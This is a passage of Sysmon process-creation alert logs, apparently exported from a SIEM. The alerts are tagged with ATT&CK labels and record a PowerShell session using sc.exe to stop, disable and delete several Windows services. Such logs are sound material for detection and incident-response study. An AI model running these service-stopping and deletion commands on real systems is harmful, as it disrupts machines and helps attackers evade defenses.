12:51:30.875"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001094652b00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.833",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.764 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001011632b00} +ProcessId: 6332 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.773042700Z"",""eventRecordID"":""3234"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.764\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001011632b00}\r\nProcessId: 6332\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.764"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001011632b00}"",""processId"":""6332"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.726",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.331 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00104c5f2b00} +ProcessId: 6488 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.334596500Z"",""eventRecordID"":""3231"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.331\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00104c5f2b00}\r\nProcessId: 6488\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.331"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-00104c5f2b00}"",""processId"":""6488"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.689",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.272 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00105c5d2b00} +ProcessId: 7428 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config wmiApServs Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config wmiApServs Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.290750400Z"",""eventRecordID"":""3230"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.272\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-00105c5d2b00}\r\nProcessId: 7428\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config wmiApServs Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.272"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-00105c5d2b00}"",""processId"":""7428"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config wmiApServs Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.491",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.196 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010365b2b00} +ProcessId: 7672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.200947500Z"",""eventRecordID"":""3228"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.196\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010365b2b00}\r\nProcessId: 7672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.196"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-0010365b2b00}"",""processId"":""7672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.431",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.099 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001096582b00} +ProcessId: 4240 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.123305900Z"",""eventRecordID"":""3225"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.099\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-001096582b00}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.099"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-001096582b00}"",""processId"":""4240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:58.364",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:30.014 +ProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010c8562b00} +ProcessId: 4656 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:30.017194500Z"",""eventRecordID"":""3223"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:30.014\r\nProcessGuid: {df9fc3d3-b3d2-5ecf-0000-0010c8562b00}\r\nProcessId: 4656\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:30.014"",""processGuid"":""{df9fc3d3-b3d2-5ecf-0000-0010c8562b00}"",""processId"":""4656"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 